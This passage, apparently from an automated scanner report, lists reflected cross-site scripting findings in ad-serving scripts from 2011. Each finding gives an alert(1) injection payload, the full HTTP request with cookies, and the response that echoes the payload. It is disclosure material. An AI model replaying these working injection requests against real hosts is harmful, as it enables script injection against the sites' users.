   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var
...[SNIP]...

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [time parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff2a"-alert(1)-"0749becdcad was submitted in the time parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-52ff2a"-alert(1)-"0749becdcad&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=86A2BDCFE710A90DB48780D5F71E13BE; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 13:13:11 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-52ff2a"-alert(1)-"0749becdcad&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

3.77. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c78d'%3balert(1)//2cf3a2b794a was submitted in the redir parameter. This input was echoed as 2c78d';alert(1)//2cf3a2b794a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=514&size=300x250&referrer=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf%3Ft=1308241078986%26tz=300%26m=0%26hu=%26ht=js%26hp=0%26fo=%26url=UniversalAudiencePlatform23.com%26refer=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&inv_code=1457934&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1457934%26r%3D0%26_salt%3D1248176818%26u%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308241078986%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%26u%3Dhttp%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F434228602c78d'%3balert(1)//2cf3a2b794a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:19:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:19:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIx6EDEAoYAiACKAIwmtro7wQQmtro7wQYAQ..; path=/; expires=Wed, 14-Sep-2011 16:19:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))ByG5K)WgR>XlY*EC'kUpXhj*P08f-.l+osXm]lt]?P8YpZL]sB9B]8%@vLP4+]>%si(ygoXp8qJOv^>`8w[tzEM:M*S>dga-Lz.gouZ`FJ8LQ_Hx!XL_1BqN4d9RmjXVxj]itc$K_9vlm+uS/i4Wr^Uz@IkJaBY!a?mr98a_2/H`Sgv'i]@ctGpyCJHYsBUYA(I8J6KzG0FZD+mLPj:N_GuqwA5eg)P]NHoKfABx<mbW5-R:0CbA*[5rwFX.Xo06%N)`n/9DtO+8b1(6SxOoh]GI?okkOPP3D@Wfqe$+P2dm?9Wx)uSQcoHBx)9D%PCY:R`-f2HA[[5%.6^BGN=lmYeohZw0hh6OAP<(:$5@sFcW!f5t6qIlyY:V(fGFk/$(q%WHFc<*hm0lvND2Dt0$]YPSM0OSV/DCcPOT9tIwe<S_0YF[lJ)hwRVfMy6SlL@?htqD-iSHI*%_c^O7k45Nx*:_S+z3kUo-9!5K36T:<6ROscQo8=NydNWdzrHGyGUUl<Hs/.5C`xkbK9b'RTE#(qG^!3a:s2hgCLFFX=ujX6FpR<qKpz#WKvy3rf#qG)QswnOe8leIXte$r+x0*urtS'Q<nCE+-E/O.ZMuyXZKm:s[KQXv.f'S.Mx8D.d*K89fMf@k!kemDaqx_7ObE+0<Cn@Df2h^pS; path=/; expires=Wed, 14-Sep-2011 16:19:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 16:19:38 GMT
Content-Length: 795

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=&Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2F
...[SNIP]...
Fid%252F43422860&u=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F434228602c78d';alert(1)//2cf3a2b794a">
...[SNIP]...

3.78. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e50b"-alert(1)-"42ec7cee457 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D71174602242e50b"-alert(1)-"42ec7cee457&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=&placementid=14302119028289010& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:38:25 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5174
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D71174602242e50b"-alert(1)-"42ec7cee457");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D71174602242e50b"-alert(1)-"42ec7cee457");
mpck =
...[SNIP]...

3.79. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89549'%3balert(1)//a9a9ec375a3 was submitted in the mpck parameter. This input was echoed as 89549';alert(1)//a9a9ec375a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D711746022489549'%3balert(1)//a9a9ec375a3&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=&placementid=14302119028289010& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:38:27 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5180
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
e=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-0?mpt=711746022489549';alert(1)//a9a9ec375a3" target="_blank">
...[SNIP]...

3.80. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30032'%3balert(1)//b1e338385e4 was submitted in the mpvc parameter. This input was echoed as 30032';alert(1)//b1e338385e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D7117460224&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=30032'%3balert(1)//b1e338385e4&placementid=14302119028289010& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:38:56 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5176
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=30032';alert(1)//b1e338385e4http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-0?mpt=7117460224" target="_blank">
...[SNIP]...

3.81. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d403"%3balert(1)//053bcfb7961 was submitted in the mpvc parameter. This input was echoed as 1d403";alert(1)//053bcfb7961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D7117460224&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=1d403"%3balert(1)//053bcfb7961&placementid=14302119028289010& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:38:53 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5176
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
lick = encodeURIComponent("http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=1d403";alert(1)//053bcfb7961");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^11
...[SNIP]...

3.82. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [placementid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab29"%3balert(1)//0d432b44dc7 was submitted in the placementid parameter. This input was echoed as 1ab29";alert(1)//0d432b44dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D7117460224&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=&placementid=143021190282890101ab29"%3balert(1)//0d432b44dc7& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:39:06 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5090
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_143021190282890101ab29";alert(1)//0d432b44dc7&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\" style='position:absolute'>
...[SNIP]...

3.83. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0052"%3balert(1)//cd5b17dac27 was submitted in the mpck parameter. This input was echoed as a0052";alert(1)//cd5b17dac27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Billabong_728x90_Male_Stagedive.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-11%3Fmpt%3Dc7bf0c0b67d142d1942f4889cc02b349a0052"%3balert(1)//cd5b17dac27&mpt=c7bf0c0b67d142d1942f4889cc02b349&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215487__campaignid=38114__zoneid=12267__UTLCA=1__cb=248fea2a941f43f5bf1871f0520578e5__bk=lmvu15__id=djjwgv9ps61khjiw8xrxaqgkm__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:06:37 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:14:49 GMT
ETag: "5e04fb-f2f-4a2d94cec4c40"
Accept-Ranges: bytes
Content-Length: 7804
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
_zoneid=12267__UTLCA=1__cb=248fea2a941f43f5bf1871f0520578e5__bk=lmvu15__id=djjwgv9ps61khjiw8xrxaqgkm__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-11?mpt=c7bf0c0b67d142d1942f4889cc02b349a0052";alert(1)//cd5b17dac27\" target=\"_blank\">
...[SNIP]...

3.84. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bad41"%3balert(1)//02f964675c9 was submitted in the mpt parameter. This input was echoed as bad41";alert(1)//02f964675c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Billabong_728x90_Male_Stagedive.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-11%3Fmpt%3Dc7bf0c0b67d142d1942f4889cc02b349&mpt=c7bf0c0b67d142d1942f4889cc02b349bad41"%3balert(1)//02f964675c9&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215487__campaignid=38114__zoneid=12267__UTLCA=1__cb=248fea2a941f43f5bf1871f0520578e5__bk=lmvu15__id=djjwgv9ps61khjiw8xrxaqgkm__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:06:47 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:14:49 GMT
ETag: "5e04fb-f2f-4a2d94cec4c40"
Accept-Ranges: bytes
Content-Length: 7416
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7488937/7488937/'+ st +'/[SiteName]/c7bf0c0b67d142d1942f4889cc02b349bad41";alert(1)//02f964675c9';
   w_adldspsend(mcdt);

